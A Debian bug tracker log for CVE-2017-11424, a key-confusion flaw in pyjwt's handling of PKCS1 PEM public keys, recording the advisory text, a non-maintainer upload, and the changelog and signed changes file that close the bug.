pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys

Debian Bug report logs - #873244
pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Subject: pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys

Date: Fri, 25 Aug 2017 20:59:33 +0200

Source: pyjwt
Version: 1.4.2-1
Severity: important
Tags: security patch upstream
Forwarded: https://github.com/jpadilla/pyjwt/pull/277
Control: found -1 0.2.1-1+deb8u1

Hi,

the following vulnerability was published for pyjwt.

CVE-2017-11424[0]:
| In PyJWT 1.5.0 and below the `invalid_strings` check in
| `HMACAlgorithm.prepare_key` does not account for all PEM encoded
| public keys. Specifically, the PKCS1 PEM encoded format would be
| allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC
| KEY-----` which is not accounted for. This enables
| symmetric/asymmetric key confusion attacks against users using the
| PKCS1 PEM encoded public keys, which would allow an attacker to craft
| JWTs from scratch.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-11424
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11424

Please adjust the affected versions in the BTS as needed. I think this
should be present as well in 0.2.1-1+deb8u1.

Regards,
Salvatore

Message #12 received at 873244@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>

To: 873244@bugs.debian.org

Cc: Moritz Muehlenhoff <jmm@debian.org>

Subject: Re: Bug#873244: pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys

Date: Thu, 31 Aug 2017 10:06:00 +0200

Control: notfound -1 0.2.1-1+deb8u1

Hi

On Fri, Aug 25, 2017 at 08:59:33PM +0200, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed. I think this
> should be present as well in 0.2.1-1+deb8u1.

Whilst the test is missing as well in 0.2.1-1+deb8u1, pyjwt in Jessie
would probably not work as expected in this regard.

I'm removing the found version for 0.2.1-1+deb8u1 for now.

Regards,
Salvatore

Message #23 received at 873244@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>

To: 873244@bugs.debian.org

Subject: pyjwt: diff for NMU version 1.4.2-1.1

Date: Sat, 16 Sep 2017 15:16:55 +0200

[Message part 1 (text/plain, inline)]

Control: tags 873244 + pending

Dear maintainer,

I've prepared an NMU for pyjwt (versioned as 1.4.2-1.1) and
uploaded it to DELAYED/10. Please feel free to tell me if I
should delay it longer.

Regards,
Salvatore

[pyjwt-1.4.2-1.1-nmu.diff (text/x-diff, attachment)]

Message #34 received at 873244-submitter@bugs.debian.org (full text, mbox, reply):

From: Daniele Tricoli <eriol@mornie.org>

To: 873244-submitter@bugs.debian.org

Subject: Bug#873244 marked as pending

Date: Sun, 24 Sep 2017 22:40:44 +0000

tag 873244 pending
thanks

Hello,

Bug #873244 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:

    https://anonscm.debian.org/cgit/python-modules/packages/pyjwt.git/commit/?id=628cc05

---
commit 628cc05d2b4e0e3791e8288783f7f6ab93747ea8
Author: Daniele Tricoli <eriol@mornie.org>
Date:   Sun Sep 24 20:17:21 2017 +0200

    New upstream release

diff --git a/debian/changelog b/debian/changelog
index 3cbfdf2..a50ff29 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+pyjwt (1.5.3-1) UNRELEASED; urgency=medium
+
+  * New upstream release. (Closes: #875951)
+    - Throw if key is an PKCS1 PEM-encoded public key (CVE-2017-11424)
+      Thanks to Salvatore Bonaccorso for working on this. (Closes: #873244)
+
+ -- Daniele Tricoli <eriol@mornie.org>  Sun, 24 Sep 2017 20:11:38 +0200
+
 pyjwt (1.4.2-1) unstable; urgency=medium
 
   * New upstream release.

Message #39 received at 873244-close@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>

To: 873244-close@bugs.debian.org

Subject: Bug#873244: fixed in pyjwt 1.4.2-1.1

Date: Mon, 25 Sep 2017 05:20:00 +0000

Source: pyjwt
Source-Version: 1.4.2-1.1

We believe that the bug you reported is fixed in the latest version of
pyjwt, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 873244@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated pyjwt package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sat, 16 Sep 2017 14:49:38 +0200
Source: pyjwt
Binary: python-jwt python3-jwt
Architecture: source
Version: 1.4.2-1.1
Distribution: unstable
Urgency: medium
Maintainer: Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Description:
 python-jwt - Python implementation of JSON Web Token
 python3-jwt - Python 3 implementation of JSON Web Token
Closes: 873244
Changes:
 pyjwt (1.4.2-1.1) unstable; urgency=medium
 .
   * Non-maintainer upload.
   * Throw if key is an PKCS1 PEM-encoded public key (CVE-2017-11424)
     (Closes: #873244)
Checksums-Sha1:
 fcbdd6c39569614d0eca7a4ff5fe2d71509be4dc 2625 pyjwt_1.4.2-1.1.dsc
 2a472ac2821d412947f4cc9c7aa0eeccedd332c9 4756 pyjwt_1.4.2-1.1.debian.tar.xz
 2b7a5c05339e5140438e4d732f0576a4b656fdbb 6798 pyjwt_1.4.2-1.1_source.buildinfo
Checksums-Sha256:
 d89dea9e19465178fbffb94c5054eacfc242da825769efaae12a7bebd216dd6c 2625 pyjwt_1.4.2-1.1.dsc
 1aefc4545440e588652699fc06bf1dada43967b6f28e5fe2aec36f1d10bef793 4756 pyjwt_1.4.2-1.1.debian.tar.xz
 5d395d97d2f657d36ef15ccf658179b88a0b0e1bc9cad33ab4dc1c3cecdd0e6d 6798 pyjwt_1.4.2-1.1_source.buildinfo
Files:
 1c974b0263920eef9937800a7b8afc19 2625 python optional pyjwt_1.4.2-1.1.dsc
 0fe46c426d5c8ca71070da0665e76f7a 4756 python optional pyjwt_1.4.2-1.1.debian.tar.xz
 4536b23e70083436f0c2641f2377d7a8 6798 python optional pyjwt_1.4.2-1.1_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlm9I2RfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89ECJwQAIHpwvJjK0CxhgDKdbEbq8AUzbYgaGm8
szUK93vOpRNViGdqzI0U37KghpyQrKG/+XH/vwXekMGcszzaeFSilFrJPSyIXDto
nJhJDGLkysSm/X+Ywqp7uV2Xc7Ow26Acj8iRy5r+UrPOT3QsBxGksf6GtHVF+P9i
PhjYkyPNm4rNvgtocBYQ8X6cw/EjKJGtWM6O8w/w18bxzH3Y8uhcnEZlDYq5yixf
nxuHTTMqz1sWtIBk7UPAOErQ2YcgkpT4qGTyTPOCgo7lnXZf4/JidLP9R8HJWpDi
Ka18idd3cBr5oYsuRCT/ZMVzxZngRyA5Ac3VeIKz1g948/ncj6j+xHIV4nXZ1sj4
QlmzrpOLxahLwT3Fou1WjL68hBP82gCPXJgxpLCumqPDNYXRzI3AmgA/8o7e4Wjl
0ImZFc4oKb1CfC8Fq/B4p8B2tQS3mIpleyN+ZDPCbzhutDtHvlF4HLMaKycozb3z
uX14cNB3bGnleZ7B17TYRxXRkXzZ3d9UQtlsFml5AGdP+5EzZvVYiX21WeTbpmfm
kApmr2RTljw7euH7cCj34MHp9tRGLKkOBlXmrbyExBUQXMGGkHDBlYa0YJC2cDsA
AX5WAlRE5+uQTHlfgPNFSx00GdRLcOKuFCLKTSQkXNQADZL7APeEUje0xYGq2Yok
NL5hAuNDFPnZ
=oz8M
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.